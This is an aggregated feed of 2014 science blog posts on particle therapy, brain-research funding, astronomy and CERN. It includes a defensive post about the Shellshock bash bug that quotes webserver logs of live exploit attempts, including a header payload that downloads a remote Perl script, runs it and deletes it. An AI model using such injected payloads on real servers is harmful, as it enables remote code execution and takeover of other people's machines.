There are 49 charged-particle treatment centers operating worldwide, including 14 in the United States, and 27 more under construction. This map shows the number of patients treated through the end of 2013 in centers that are now in operation. Source: Particle Therapy Co-Operative Group.

Artwork by: Sandbox Studio, Chicago with Shawna X.

Reconnoitering with proton CT

The idea is simple: Use protons rather than X-rays to make the images. The protons are tuned to high enough energies that they go through the body without stopping, depositing about one-tenth as much radiation along their path as X-rays do. 

Detectors in front of and behind the body pinpoint where each proton beam enters and leaves, and a separate detector measures how much energy the protons lose as they pass through tissues. By directing proton beams through the patient from different angles, doctors can create a 3-D image that tells them, much more accurately than X-rays, how to tune the proton beam so it stops inside the tumor.

Two teams are now in friendly competition, testing rival ways to perform proton CT on “phantom” human heads made of plastic. Both approaches are based on detectors that are staples in particle physics.

One team is made up of researchers from Northern Illinois University, Fermilab, Argonne National Laboratory and the University of Delhi in India and funded by the US Army Medical Research Acquisition Center in Maryland. They use a pair of fiber trackers on each side of the phantom head to pinpoint where the proton beams enter and exit. Each tracker contains thousands of thin plastic fibers. When a proton hits a fiber, it gives off a flash of light that is picked up by another physics standby—a silicon photomultiplier—and conveyed to a detector.

The team is testing this system, which includes computers and software for turning the data into images, at the CDH Proton Center in Warrenville, Illinois.

“The point is to demonstrate you can get the image quality you need to target the treatment more accurately with a lower radiation dose level than with X-ray CT,” says Peter Wilson, principal investigator for the Fermilab part of the project.

The second project, a collaboration between researchers at Loma Linda, University of California, Santa Cruz, and Baylor University, is fi-nanced by a $2 million grant from the National Institutes of Health. Their proton CT system is based on silicon strip detectors the Santa Cruz group developed for the Fermi Gamma-ray Space Telescope and the ATLAS experiment at CERN, among others. It’s being tested at Loma Linda.

“We know how to detect charged particles with silicon detectors. Charged particles for us are duck soup,” says UCSC particle physicist Hartmut Sadrozinski, who has been working with these detectors for more than 30 years. Since a single scan requires tracking about a billion protons, the researchers also introduced software packages developed for high-energy physics to analyze the high volume of data coming into the detector.

Proton CT will have to get a lot faster before it’s ready for the treatment room. In experiments with the phantom head, the system can detect a million protons per second, completing a scan in about 10 minutes, Sadrozinski says; the goal is to bring that down to 2 to 3 minutes, reducing the time the patient has to hold still and ensuring accurate images and dose delivery.

Trimming the size and cost of ion therapy

The first ion therapy center opened in Japan in 1994; by the end of 2013 centers in Japan, China, Germany and Italy had treated nearly 13,000 patients.

There’s reason to think ions could be more effective than protons or X-rays for treating certain types of cancer, according to a recent review of the field published in Radiation Oncology by researchers from the National Cancer Institute and Walter Reed National Military Medical Center. Ions deliver a more powerful punch than protons, causing more damage to a tumor’s DNA, and patient treatments have shown promise.

But the high cost of building and operating treatment centers has held the technology back, the researchers wrote; and long-term research on possible side effects, including the possibility of triggering secondary cancers, is lacking.

The cost of building ion treatment centers is higher in part because the ions are so much heavier than protons. You need bigger magnets to steer them around an accelerator, and heavier equipment to deliver them to the patient.

Two projects at Brookhaven National Laboratory aim to bring the size and cost of the equipment down.

One team, led by accelerator physicist Dejan Trbojevic, has developed and patented a simpler, less expensive gantry that rotates around a stationary patient to aim an ion beam at a tumor from various angles. Gantries for ion therapy can be huge—the one in use at the Heidelberg Ion-Beam Therapy Center in Germany weighs 670 tons and is tall as a jetliner. The new design shrinks the size of the gantry by making a single set of simpler, smaller magnets do double duty, both bending and focusing the particle beam.

In the second project, Brookhaven scientists are working with a Virginia company, Best Medical International, to design a system for treating patients with protons, carbon ions and other ion beams. Called the ion Rapidly Cycling Medical Synchrotron (iRCMS), it is designed to deliver ions to patients in smaller, more rapid pulses. With smaller pulses, the diameter of the beam also shrinks, along with the size of the magnets used to steer it. Brookhaven is building one of the system’s three magnet girders, radio-frequency acceleration cavities and a power supply for a prototype system. The end product must be simple and reliable enough for trained hospital technicians to operate for years.

“A particle accelerator for cancer treatment has to be industrial, robust—not the high-tech, high-performance, typical machine we’re used to,” says Brookhaven’s Peggs, one of the lead scientists on the project. “It’s more like a Nissan than a Ferrari.”

Artwork by: Sandbox Studio, Chicago with Shawna X.

Launching a CERN initiative for cancer treatment

CERN, the international particle physics center in Geneva, is best known to many as the place where the Higgs boson was discovered in 2012. In 1996 it began collaborating on a study called PIMMS that designed a system for delivering both proton and ion treatments. That system evolved into the equipment at the heart of two ion therapy centers: CNAO, the National Center for Oncological Treatment in Pavia, Italy, which treated its first patient in 2011, and MedAustron, scheduled to open in Austria in 2015.

Now scientists at CERN want to spearhead an international collaboration to design a new, more compact treatment system that will incorporate the latest particle physics technologies. It’s part of a larger CERN initiative launched late last year with a goal of contributing to a global system for treating cancer with charged-particle beams.

Part of an existing CERN accelerator, the Low Energy Ion Ring, will be converted into a facility to provide various types of charged-particle beams for research into how they affect healthy and cancerous tissue. The lab will also consider developing detectors for making medical images and controlling the treatment beam, investigating ways to control the dose the patient receives and adapting large-scale computing for medical applications.

CERN will provide seed funding and seek out other funding from foundations, philanthropists and other sources, such as the European Union.

“Part of CERN’s mission is knowledge transfer,” says Steve Myers, director of the medical initiative, who spent the past five years running the Large Hadron Collider as director of accelerators and technology for CERN.

“We would like to make the technologies we have developed for particle physics available to other fields of research simply because we think it’s a nice thing to do,” he says. “All the things we do are related to the same goal, which is treating cancer tumors in the most effective and efficient way possible.”

Expanding the options in the US

In the US, the biggest barrier to setting up ion treatment centers is financial: Treatment centers cost hundreds of millions of dollars. Unlike in Europe and Asia, no government funding is available, so these projects have to attract private investors. But without rigorous studies showing that ion therapy is worth the added cost in terms of eradicating cancer, slowing its spread or improving patients’ lives, investors are reluctant to pony up money and insurance companies are reluctant to pay for treatments.

Studies that rigorously compare the results of proton or ion treatment with standard radiation therapy are just starting, says James Deye, program director for medical physics at the National Cancer Institute’s radiation research program.

The need for more research on ion therapy has caught the attention of the Department of Energy, whose Office of High Energy Physics oversees fundamental, long-term accelerator research in the US. A 2010 report, “Accelerators for America’s Future,” identified ion therapy as one of a number of areas where accelerator research and development could make important contributions to society.

In January 2013, more than 60 experts from the US, Japan and Europe met at a workshop sponsored by the DOE and NCI to identify areas where more research is needed on both the hardware and medical sides to develop the ion therapy systems of the future. Ideally, the participants concluded, future facilities should offer treatment with multiple types of charged particles—from protons to lithium, helium, boron and carbon ions—to allow researchers to compare their effectiveness and individual patients to get more than one type of treatment.

In June, the DOE’s Accelerator Stewardship program asked researchers to submit proposals for seed funding to improve accelerator and beam delivery systems for ion therapy.

“If there are accelerator technologies that can better enable this type of treatment, our job is to apply our R&D and technical skills to try to improve their ability to do so,” says Michael Zisman, an accelerator physicist from Lawrence Berkeley National Laboratory who is temporarily detailed to the DOE Office of High Energy Physics.

“Ideally we hope there will be partnerships between labs, industry, universities and medical facilities,” he says. “We don’t want good technology ideas in search of a problem. We rather want to make sure our customers are identifying real problems that we believe the application of improved accelerator technology can actually solve.”


Like what you see? Sign up for a free subscription to symmetry!

by Glennda Chui at September 30, 2014 07:20 PM

The Great Beyond - Nature blog

NIH awards $46 million for brain-research tools

Just 18 months after the White House announced the Brain Research through Advancing Innovative Neurotechnologies (BRAIN) Initiative, the US National Institutes of Health has awarded its first US$46 million in grants for the programme.

“We have referred to this as a moonshot,” said NIH director Francis Collins at a 30 September press conference. ”To me, as someone who had the privilege of leading the Human Genome Project, this sort of has the same feel as October 1990, when the first genome centres were announced.”

The 58 NIH grants, which range in size from about $300,000 to $1.9 million, will support more than 100 researchers. According to Story Landis, director of the National Institute of Neurological Disorders and Stroke, the NIH received more than 300 grant applications, and ended up spending $6 million more than it had anticipated in order to fund as many of these grants as possible.

The awards address research priorities included in the NIH’s 10-year plan for the BRAIN Initiative; most will support the development of new tools to monitor the brain, such as a wearable positron emission tomography (PET) scanner that could monitor a person’s brain activity as she goes about her day. Some of these tools could eventually be used for studying and treating human disorders, including grants for imaging neurotransmitters such as dopamine in real time in a living brain, which Thomas Insel, director of the National Institute of Mental Health, says will be extremely useful for studying disorders such as depression. Other tools will be useful primarily for basic research, including many potential improvements on optogenetics – using light to control neuronal firing in animals.

“It’s a new era of exploration, an exploration of inner space instead of outer space,” says Cornelia Bargmann, a neurobiologist at Rockefeller University in New York . “We feel a little like Galileo looking at the sky through his telescope for the first time.”

The NIH’s master plan calls for $4.5 billion for BRAIN Initiative research over the next 10 years, a goal that will require support from Congress to increase the agency’s overall budget. To allay concerns that BRAIN initiative will detract from other NIH-funded research, Collins noted that the BRAIN funding request is dwarfed by the $5.5 billion the agency spends on neuroscience research annually.

The NIH is the last of the three agencies involved in BRAIN to announce its awards. The Defense Advanced Projects Research Agency, which received $50 million this year, has announced several multimillion dollar grants for therapeutic applications such as brain stimulation to improve memory and prosthetic limbs controlled by brain activity. The National Science Foundation received $30 million and, in August, announced 36 small awards for basic research in topics such as brain evolution and ways to store data collected from brains.

Meanwhile, two additional federal agencies — the US Food and Drug Administration (FDA) and the Intelligence Advanced Research Projects Activity (IARPA) — are set to join the effort, the White House announced on 30 September.

The FDA will be working with the other agencies to enable the development of medical and research devices that could be used in humans. IARPA will be joining BRAIN with several of its own ongoing research programmes, including an effort to develop new artificial intelligence systems based on the brain’s network patterns and a study on the use of brain stimulation to increase human problem-solving ability. According to the White House, the total investment in BRAIN Initiative research this year by government and private funding sources, such as the Kavli Foundation, totals more than $300 million.

by Sara Reardon at September 30, 2014 07:15 PM

Emily Lakdawalla - The Planetary Society Blog

More LightSail Day-in-the-Life Multimedia, and a Community Image Processing Challenge
We have more multimedia from LightSail's day-in-the-life test, as well as a request for some community image processing help.

September 30, 2014 06:07 PM

astrobites - astro-ph reader's digest

Measuring Galaxy Star Formation

Astronomers constantly try to use what we can observe now to deduce facts about the past. The star formation rate (SFR) and the star formation history (SFH) are two of the key components used to describe and understand the evolution of galaxies. The star formation rate is the total mass of stars formed per year, often given as solar masses per year. The star formation history is how stars formed over time and space, whether in short bursts or over longer periods. Both of these are important quantities that help characterize the history of galaxies. For example, it is thought, though still debated, that the Milky Way had several bursts of star formation in the past and the current star formation rate is around one solar mass per year.

Most measurements of the star formation history assume that star formation occurred in one burst at a constant rate over 100 Myr. This assumption might be true for spiral galaxies evolving by themselves. However, the star formation history for a galaxy that had violent mergers in the past is likely to be much more complicated. This paper seeks to understand whether 100 Myr is a fair assumption. By modeling different galaxies with different star formation histories the authors compare the simulated SFR with what astronomers would measure.

Astronomers use five main methods to measure the SFR. Each measures the flux at different wavelengths to back out the recent star formation. The most massive stars are brightest in the UV. Studying either the far or near UV flux (FUV and NUV) constrains the recent formation of massive stars which provides the majority of the SFR. This method has also been applied by looking at the U band flux. Studying the total IR emission works in a similar fashion. These very hot stars heat dust grains which re-radiate the energy in the IR. Finally, the Lyman continuum emission is responsible for ionizing the hydrogen in star forming regions, which can be traced through specific recombination lines.

The authors used a simulation called MIRAGE to simulate 23 different galaxies. These galaxies included a combination of merging galaxies and isolated galaxies. The galaxies varied over their initial masses, orientation, and initial gas fraction meant to represent galaxies between redshifts of 1 and 2. These simulations were run for 800 Myr at 1 Myr timesteps. A simulated spectrum for each galaxy was made at each timestep. This allowed the authors to compare the simulated SFR with different commonly used methods for measuring the SFR from spectral information.


Figure 1: The calculated SFR as a function of age compared to the known SFR from the simulation. Black is the known SFR. Magenta is from the Lyman continuum method. Blue is the Far UV measurement. Cyan is the near UV measurement. Green is the U band measurement. Red is the total IR measurement.

Figure 1 shows the results of the simulation and measured SFRs between 350 Myr and 450 Myr. The results from this time segment are the same as at all other times in the simulation. The true SFR is shown in black while all the other curves are various methods of measuring the SFR from the simulated spectra. The Lyman continuum method (shown as magenta) follows the true SFR quite well. All other methods overestimate the SFR by 25 per cent to 65 per cent.

The authors then seek to understand why the SFR would be significantly overstated in so many of these measurements. Many stars will live longer than 100 Myr. These stars will still contribute flux to the measurements, but will bias them because they do not represent the actual star formation over the past 100 Myr. Correcting for these long-lived stars reduces the overestimate of the SFR in the various methods down to 10 per cent.

With this in mind, the authors advise that the method used to measure the SFR should be carefully chosen based on the type of galaxy being studied. The authors suggest that a longer timescale, of order 1 Gyr rather than 100 Myr, be used for isolated galaxies to account for contamination from older stellar populations. Star-bursting galaxies with rapid, ongoing star formation permit instead shorter timescales as the contribution from these older populations will be fractionally smaller.

These results help put measured star formation rates in real galaxies in perspective. Most methods discussed in this paper overestimate the true SFR. This overestimate can help astronomers calibrate the exact role that the SFR does play as galaxies evolve over time. And how that relates to the SFR shutting down.

by Josh Fuchs at September 30, 2014 02:58 PM

Christian P. Robert - xi'an's og

The chocolate factory gone up in smoke

There was a major fire near my house yesterday with many fire-engines rushing by and a wet smoke smell lingering by the whole night. As I found out during my early morning run, the nearby chocolate factory had completely burned. Actually, sixteen  hours after the beginning of the fire, the building was still smouldering, with a dozen fire-engines yet on site and huge hoses running on adjacent streets. A fireman told me the fire had started from an electric spark and that the entire  reserves had been destroyed. This is quite sad, as hitting a local business and a great chocolate maker, Patrick Roger. I do not know whether or not the company will survive this disaster, but if you happen to come by one of the shops in Paris or Brussels, drop in and buy some chocolates! For the taste of it and as a support.

Filed under: Kids, Running Tagged: chocolate, fire, Patrick Roger, Sceaux

by xi'an at September 30, 2014 02:52 PM

Lubos Motl - string vacua and pheno

Glimpsed second Higgs at \(137\GeV\) OK with BLSSM, not MSSM
Fifteen months ago, I discussed a very interesting paper by CMS that has seen a 2.73-sigma or 2.93-sigma (depending on details) excess suggesting the existence of a second CP-even neutral Higgs boson at mass \(m_{h'}=136.5\GeV\).

Three months later, I mentioned some weak dilepton evidence in favor of this new particle. Today, W. Abdallah, S. Khalil, and S. Moretti released a hep-ph preprint that tests the incorporation of this hypothetical second Higgs boson into supersymmetric models:
Double Higgs peak in the minimal SUSY \(B-L\) model
It may be the most interesting paper on the arXiv today.

They perform some detailed analysis and conclude that the Minimal Supersymmetric Standard Model, or MSSM, isn't compatible with all these data. However, one extremely simple and well-motivated extension of the MSSM, the BLSSM – the \(B-L\) Supersymmetric Standard Model – seems to agree perfectly.

It is a model that (or to say the least, whose spectrum) you may consider to be a low-energy limit of the \(SO(10)\) grand unified theories (GUT) – which seem more attractive and supported by the data than the minimal \(SU(5)\) GUTs, anyway, e.g. because of suggestive neutrino patterns, love of David Gross :-), a simple incorporation to heterotic string theory, and other reasons.

The BLSSM has an extra right-handed neutrino supermultiplet in each generation of fermions; recall that in \(SO(10)\) GUTs, they are coming naturally from the \({\bf 16}\) spinorial representation responsible for all the quarks and leptons, including the right-handed neutrinos. A seesaw mechanism may be naturally combined with this spectrum to produce the observed small neutrino masses – something that is less natural or at least less explicit in the MSSM.

There's also the \(U(1)_{B-L}\) gauge field with its gauge bosons and gauginos. Recall that if you embed \(U(5)=U(1)\times SU(5)\) to \(SO(10)\), this difference of the baryon and lepton numbers arises as the extra \(U(1)\).

Finally, the BLSSM contains some extra neutral Higgs supermultiplet. It also increases the natural expected masses of the Higgs bosons relatively to the MSSM which reduces the "small amount of fine-tuning" or "small hierarchy problem" that is apparently present according to the MSSM.

ATLAS hasn't told us whether it sees the resonance near \(137\GeV\) as well. It could be very interesting because such a newly discovered particle would be not only a strong piece of evidence in favor of SUSY but also in favor of grand unification – and in fact, a prettier, non-minimal version of it!

And imagine the excitement that the second \(137\GeV\) Higgs boson would bring to all the numerologists obsessed with the fine-structure constant.

I am promising you absolutely nothing but stay tuned. ;-)

Director Rolf Heuer celebrates CERN's 60th birthday with a gesture he learned from his granddad. Congratulations!

P.S.: I made a search for papers and talks that would mention a \(137\GeV\) Higgs boson. Remarkably, ATLAS has seen a small excess in the diphoton channel around \(137\GeV\) as well, see e.g. pages 10 and 16 of these slides. The \(137\GeV\) Higgs boson appears six times in these older slides, too. See also this August 2012 paper on these two bosons. In 2011, \(137\GeV\) was also the upper bound on the Higgs mass imposed by the Tevatron but as far as I see, there was no bump over there – just a monotonic curve for the probability that crossed a threshold.

by Luboš Motl ( at September 30, 2014 02:44 PM

Quantum Diaries

High school students advance particle physics and their own science education at Fermilab

This article appeared in Fermilab Today on Sept. 30, 2014.

Illinois Mathematics and Science Academy students Nerione Agrawal (left) and Paul Nebres (right) work on the Muon g-2 experiment through the Student Inquiry and Research program. Muon g-2 scientist Brendan Kiburg (center) co-mentors the students. Photo: Fermilab

Illinois Mathematics and Science Academy students Nerione Agrawal (left) and Paul Nebres (right) work on the Muon g-2 experiment through the Student Inquiry and Research program. Muon g-2 scientist Brendan Kiburg (center) co-mentors the students. Photo: Fermilab

As an eighth grader, Paul Nebres took part in a 2012 field trip to Fermilab. He learned about the laboratory’s exciting scientific experiments, said hello to a few bison and went home inspired.

Now a junior at the Illinois Mathematics and Science Academy (IMSA) in Aurora, Nebres is back at Fermilab, this time actively contributing to its scientific program. He’s been working on the Muon g-2 project since the summer, writing software that will help shape the magnetic field that guides muons around a 150-foot-circumference muon storage ring.

Nebres is one of 13 IMSA students at Fermilab. The high school students are part of the academy’s Student Inquiry and Research program, or SIR. Every Wednesday over the course of a school year, the students use these weekly Inquiry Days to work at the laboratory, putting their skills to work and learning new ones that advance their understanding in the STEM fields.

The program is a win for both the laboratory and the students, who work on DZero, MicroBooNE, MINERvA and electrical engineering projects, in addition to Muon g-2.

“You can throw challenging problems at these students, problems you really want solved, and then they contribute to an important part of the experiment,” said Muon g-2 scientist Brendan Kiburg, who co-mentors a group of four SIR students with scientists Brendan Casey and Tammy Walton. “Students can build on various aspects of the projects over time toward a science result and accumulate quite a nice portfolio.”

This year roughly 250 IMSA students are in the broader SIR program, conducting independent research projects at Argonne National Laboratory, the University of Chicago and other Chicago-area institutions.

IMSA junior Nerione Agrawal, who started in the SIR program this month, uses her background in computing and engineering to simulate the potential materials that will be used to build Muon g-2 detectors.

“I’d been to Fermilab a couple of times before attending IMSA, and when I found out that you could do an SIR at Fermilab, I decided I wanted to do it,” she said. “I’ve really enjoyed it so far. I’ve learned so much in three weeks alone.”

The opportunities for students at the laboratory extend beyond their particular projects.

“We had the summer undergraduate lecture series, so apart from doing background for the experiment, I learned what else is going on around Fermilab, too,” Nebres said. “I didn’t expect the amount of collaboration that goes on around here to be at the level that it is.”

In April, every SIR student will create a poster on his or her project and give a short talk at the annual IMSAloquium.

Kiburg encourages other researchers at the lab to advance their projects while nurturing young talent through SIR.

“This is an opportunity to let a creative person take the reins of a project, steward it to completion or to a point that you could pick up where they leave off and finish it,” he said. “There’s a real deliverable outcome. It’s inspiring.”

Leah Hesla

by Fermilab at September 30, 2014 01:58 PM

Peter Coles - In the Dark

The Origin of CERN

Since  CERN, the Geneva home of the Large Hadron Collider, is currently celebrating its 60th Anniversary, I thought I would use this organ to correct a widespread misapprehension concerning the the true historical origin of that organization. I have to say the general misunderstanding of the background to CERN is not helped by the information produced locally which insists that CERN is an acronym for Conseil Européen pour la Recherche Nucléaire and that it came into being in 1954. This may be the date at which the Geneva operation commenced, but the organization has a far older origin than that.

CERN is in fact named after the Dorset village of Cerne Abbas, most famous for a prehistoric hill figure called the Cerne Abbas Giant. The following aerial photograph of this outstanding local landmark proves that the inhabitants of Dorset had the idea of erecting a large hardon facility hundreds of years ago…

by telescoper at September 30, 2014 01:10 PM

ZapperZ - Physics and Physicists

2014 Nobel Prize Prediction
As is customary at this time of the year, everyone is anticipating the announcement out of Sweden of this year's Nobel Prize award. Of course, there have been some guessing game on who will receive the prestigious prize. Science Watch has made its own predictions this year. Interestingly enough, all of their candidates are from Material Science/Condensed Matter field. Maybe this is to balance out the fact that last year, the winners were from elementary particle/high energy physics theory.


by ZapperZ ( at September 30, 2014 12:46 PM

Peter Coles - In the Dark

Poetic Words: Dannie Abse


I don’t usually post about poetry two days running, but circumstances seem to justify reblog of the poem Three Street Musicians by wonderful Welsh poet Dannie Abse, who died on Sunday.

Originally posted on A Few Reasonable Words:

Tipped by BBC Radio’s Words and Music on the legend of Orpheus, found this wonderful poem by
the Welsh poet Dannie Abse.

Three Street Musicians

Three street musicians in mourning overcoats
worn too long, shake money boxes this morning,
then, afterwards, play their suicide notes.

The violinist in chic, black spectacles, blind,
the stout tenor with a fake Napoleon stance,
and the looney flautist following behind,

they try to importune us, the busy living,
who hear melodic snatches of musichall
above unceasing waterfalls of traffic.

Yet if anything can summon back the dead
it is the old-time sound, old obstinate tunes,
such as they achingly render and suspend:

‘The Minstrel Boy’, ‘Roses of Picardy’.
No wonder cemeteries are full of silences
and stones keep down the dead that they defend.

Stones too light! Airs unresistible!
Even a dog listens, one paw raised, while the stout,
loud man amazes with…

View original 48 more words

by telescoper at September 30, 2014 12:33 PM

Tommaso Dorigo - Scientificblogging

Top Mass: CMS Again On Top!
I wonder how interesting can be to an outsider to learn that the mass of the sixth quark is now known to 0.38% accuracy, thanks to the combination of measurements of that quantity performed by the CMS experiment at CERN. In fact, the previously best measurement was the one recently published by the DZERO collaboration at Fermilab, which has a relative 0.43% accuracy. "So what" - you might say - "this 14% improvement does not change my life". That's undeniably true.

read more

by Tommaso Dorigo at September 30, 2014 10:47 AM

Emily Lakdawalla - The Planetary Society Blog

Planetary Society President Testifies Before Congress
Society President Dr. Jim Bell provided expert testimony at a September hearing on the state (and fate) of planetary science.

September 30, 2014 04:38 AM

Jaques Distler - Musings

Shellshock and MacOSX

Most Linux Distros have released patches for the recently-discovered “Shellshock” bug in /bin/bash. Apple has not, despite the fact that it uses bash as the default system shell (/bin/sh).

If you are running a webserver, you are vulnerable. Even if you avoid the obvious pitfall of writing CGI scripts as shellscripts, you are still vulnerable if one of your Perl (or PHP) scripts calls out to system(). Even Phusion Passenger is vulnerable. And, yes, this vulnerability is being actively exploited on the Web. - - [24/Sep/2014:20:35:04 -0500] "GET / HTTP/1.0" 301 402 "() { :; }; ping -c 11" "shellshock-scan (" "-" - - - - - [25/Sep/2014:02:50:59 -0500] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 301 411 "-" "() { :;}; /bin/ping -c 1" "-" - - - - - [25/Sep/2014:18:55:31 -0500] "GET / HTTP/1.1" 301 379 "() { :; }; /bin/ping -c 1" "() { :; }; /bin/ping -c 1" "-" - - - - - [25/Sep/2014:20:05:01 -0500] "GET / HTTP/1.1" 301 379 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a" "-" - - - - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/php5 HTTP/1.0" 301 391 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/php HTTP/1.0" 301 390 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/php.fcgi HTTP/1.0" 301 395 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/ HTTP/1.0" 301 394 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/ HTTP/1.0" 301 394 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - - - [26/Sep/2014:03:29:40 -0500] "GET /test HTTP/1.0" 301 383 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/ HTTP/1.0" 301 394 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" -  - - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/php HTTP/1.0" 404 359 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/php5 HTTP/1.0" 404 360 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/php.fcgi HTTP/1.0" 404 364 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - - [26/Sep/2014:03:29:41 -0500] "GET /test HTTP/1.0" 404 352 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/ HTTP/1.0" 404 363 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/ HTTP/1.0" 404 363 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/ HTTP/1.0" 404 363 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - - - [26/Sep/2014:14:39:29 -0500] "GET / HTTP/1.1" 301 385 "-" "() { :;}; /bin/bash -c \"wget --delete-after\"" "-" - - - - - [26/Sep/2014:14:39:30 -0500] "GET / HTTP/1.1" 200 155 "-" "() { :;}; /bin/bash -c \"wget --delete-after\"" "-" - - - - - [26/Sep/2014:15:09:21 -0500] "GET /category/2007/07/making_adscft_precise.html%0A HTTP/1.1" 301 431 "-" "() { :;}; echo -e 'detector'" "-" - - - - - [26/Sep/2014:15:09:23 -0500] "GET /category/2007/07/making_adscft_precise.html%0D%0A HTTP/1.1" 301 434 "-" "() { :;}; echo -e 'detector'" "-" - - - - - [26/Sep/2014:15:09:24 -0500] "GET /category/2007/07/making_adscft_precise.html%0d%0a HTTP/1.1" 404 393 "-" "() { :;}; echo -e 'detector'" "-" - - - - - [26/Sep/2014:15:09:33 -0500] "GET /category/2007/07/making_adscft_precise.html%0a HTTP/1.1" 404 392 "-" "() { :;}; echo -e 'detector'" "-" - - - - - [26/Sep/2014:15:11:41 -0500] "GET /category/2008/02/bruce_bartlett_on_the_charged.html%0A HTTP/1.1" 301 439 "-" "() { :;}; echo -e 'detector'" "-" - - - - - [26/Sep/2014:15:11:44 -0500] "GET /category/2008/02/bruce_bartlett_on_the_charged.html%0a HTTP/1.1" 404 400 "-" "() { :;}; echo -e 'detector'" "-" - - -

Some of these look like harmless probes; others (like the one which tries to download and run an IRCbot on your machine) less so.

If you’re not running a webserver, the danger is less clear. There are persistent (but apparently incorrect) rumours that Apple’s DHCP client may be vulnerable. If true, then your iPhone could easily be pwned by a rogue DHCP server (running on someone’s laptop) at Starbucks.

I don’t know what to do about your iPhone, but at least you can patch your MacOSX machine yourself.

The following instructions (adapted from this blog post) are for MacOSX 10.9 (Mavericks). The idea is to download Apple’s source code for bash, patch it using the official bash patches, and recompile. If you are running an earlier version of MacOSX, you’ll have to download the appropriate package from Apple and use the corresponding patches for bash. Of course, you’ll need XCode, which is free from the App Store.

Fire up and do

mkdir bash
cd bash/
curl -O
tar xzf bash-92.tar.gz
cd bash-92/bash-3.2/
curl | patch -p0
curl | patch -p0
curl | patch -p0
cd ..
sudo cp /bin/bash /bin/bash.vulnerable
sudo cp /bin/sh /bin/sh.vulnerable
sudo chmod 0000 /bin/*.vulnerable
sudo cp build/Release/bash build/Release/sh /bin/

Now you can try (in a new shell)


which should yield



env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

should yield

bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test


env X='() { (a)=>\' sh -c "echo date"; cat echo

should yield

sh: X: line 1: syntax error near unexpected token `='
sh: X: line 1: `'
sh: error importing function definition for `X'
cat: echo: No such file or directory

Approach these instructions with some caution.

  • You absolutely need a working version of /bin/sh for your system to function.
  • If you have a bunch of machines to update (as I did), you may be better-off copying the new versions of bash and sh onto a thumb drive and using that to update your other machines.

Update (9/28/2014):

Apple has issued a statement to the effect that ordinary client systems are not remote-exploitable. At least as far as DHCP goes, that seems to be the case. The DHCP client functionality is implemented by the IPConfiguration agent, run by configd; no shellscripts are involved (unlike, say, under Linux). There are other subsystems to worry about (CUPS, SNMP, …), even on “client” systems. But I think I’ll give Apple the benefit of the doubt on that score.

Update (9/29/2014):

Apple has finally issued Bash patches for Mavericks, Mountain Lion and Lion. Oddly, these only bring Bash up to 3.2.53, rather than 3.2.54 (which is the latest, and hopefully final, iteration defanging the Shellshock attack).

by distler ( at September 30, 2014 04:34 AM

Emily Lakdawalla - The Planetary Society Blog

Brief mission update: Hayabusa 2 has a launch date!
JAXA announced the launch date for their Hayabusa 2 asteroid sample return mission today: November 30 at 13:24:48 Japan standard time (04:24:48 UT / November 29 at 20:24:48 PST)

September 30, 2014 04:28 AM

September 29, 2014

Christian P. Robert - xi'an's og

The Unimaginable Mathematics of Borges’ Library of Babel [book review]

